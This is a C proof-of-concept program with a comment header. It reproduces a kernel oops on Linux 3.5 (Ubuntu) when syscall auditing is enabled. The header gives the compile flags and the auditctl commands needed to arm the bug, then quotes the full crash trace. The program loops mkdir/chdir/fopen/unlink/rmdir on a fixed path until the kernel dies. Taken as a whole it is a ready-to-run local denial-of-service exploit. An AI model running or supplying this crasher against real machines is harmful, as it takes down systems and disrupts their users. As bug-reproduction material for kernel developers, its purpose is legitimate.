/*
 * steps:
 *  1) compile with gcc -m32
 *  2) start auditd, install any rule (I've only tested syscall auditing, but any syscall seems to work).
 *     /etc/init.d/auditd start ; auditctl -D ; auditctl -a exit,always -F arch=b64 -S chmod
 *  3) run'n wait (this only loops twice for me before dying)
 *     ./a.out
 *  4) instantaneous kernel oops.
 *
 * kernel BUG at /build/buildd/linux-3.5.0/fs/buffer.c:1218!
 * invalid opcode: 0000 [#3] SMP 
 * CPU 3 
 * Modules linked in:[  499.132393]  lp microcode parport
 * 
 * Pid: 6249, comm: a.out Tainted: G      D      3.5.0-22-generic #34-Ubuntu  
 * RIP: e030:[<ffffffff81679962>]  [<ffffffff81679962>] check_irqs_on.part.9+0x4/0x6
 * RSP: e02b:ffff8800f36e1c08  EFLAGS: 00010046
 * RAX: ffff880003570000 RBX: 0000000000001000 RCX: ffff880003573000
 * RDX: 0000000000001000 RSI: 000000000020021d RDI: ffff8800045dc340
 * RBP: ffff8800f36e1c08 R08: 0000000000000000 R09: 0000000000000000
 * R10: ffff880003573000 R11: ffff8800f39de860 R12: ffff8800f36e1dd0
 * R13: 0000000000001fd6 R14: ffff880003573400 R15: ffff8800045dc340
 * FS:  00007f12fe20e700(0000) GS:ffff8800ff980000(0063) knlGS:0000000000000000
 * CS:  e033 DS: 002b ES: 002b CR0: 000000008005003b
 * CR2: 00000000f7652ad0 CR3: 000000000330f000 CR4: 0000000000000660
 * DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
 * DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
 * Process a.out (pid: 6249, threadinfo ffff8800f36e0000, task ffff8800f2cb5c00)
 * Stack:
 *  ffff8800f36e1c78 ffffffff811b35d9 ffff8800f36e1c28 ffffffff8107e6c1
 *  ffff8800f36e1c78 ffffffff8118d5c6 ffff8800f36e1d20 ffff8800f2cb5c00
 *  ffff8800f36e1e78 ffff8800e0117c30 0000000000001000 ffff8800f36e1dd0
 * Call Trace:
 *  [<ffffffff811b35d9>] __find_get_block+0x1f9/0x200
 *  [<ffffffff8107e6c1>] ? in_group_p+0x31/0x40
 *  [<ffffffff8118d5c6>] ? generic_permission+0x176/0x260
 *  [<ffffffff811b3604>] __getblk+0x24/0x2e0
 *  [<ffffffff8125bb84>] ? ext4_xattr_get+0xe4/0x2e0
 *  [<ffffffff8121c00d>] __ext4_get_inode_loc+0xed/0x410
 *  [<ffffffff8121d70d>] ext4_get_inode_loc+0x1d/0x20
 *  [<ffffffff812200dd>] ext4_reserve_inode_write+0x2d/0xa0
 *  [<ffffffff812223bf>] ? ext4_evict_inode+0x1bf/0x490
 *  [<ffffffff8122019f>] ext4_mark_inode_dirty+0x4f/0x1f0
 *  [<ffffffff812223bf>] ext4_evict_inode+0x1bf/0x490
 *  [<ffffffff8119c806>] evict+0xb6/0x1b0
 *  [<ffffffff8119d019>] iput+0x109/0x190
 *  [<ffffffff81197be8>] d_kill+0x108/0x150
 *  [<ffffffff81198332>] dput+0xe2/0x1d0
 *  [<ffffffff8118c8da>] path_put+0x1a/0x30
 *  [<ffffffff810cebab>] __audit_syscall_exit+0x34b/0x480
 *  [<ffffffff8168d622>] sysretl_audit+0x29/0x5b
 * Code: 80 0e a2 81 e8 9c cc ff ff 4d 85 e4 74 14 49 8d 7c 24 5c e8 91 82 99 ff 66 90 4c 89 
 * e7 e8 f7 e8 b1 ff 5b 41 5c 5d c3 55 48 89 e5 <0f> 0b 55 48 89 e5 0f 0b 55 48 89 e5 0f 0b 
 * 55 48 89 e5 0f 0b 55 
 * RIP  [<ffffffff81679962>] check_irqs_on.part.9+0x4/0x6
 *  RSP <ffff8800f36e1c08>
 */

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define KILLDIR "/usr/local/tmp/crasher/kill_dir"

int main(void) {
  FILE *f;
  char fullpath[512];
  int i = 0;

  while (1) {
    fprintf(stderr, "%d ", i++);
    mkdir(KILLDIR, 0777);
    chdir(KILLDIR);
    sprintf(fullpath, "%s/file", KILLDIR);
    f = fopen(fullpath, "w+");
    fprintf(f, "nothing to see here");
    fclose(f);
    unlink(fullpath);
    rmdir(KILLDIR);
  }
  return 0;
}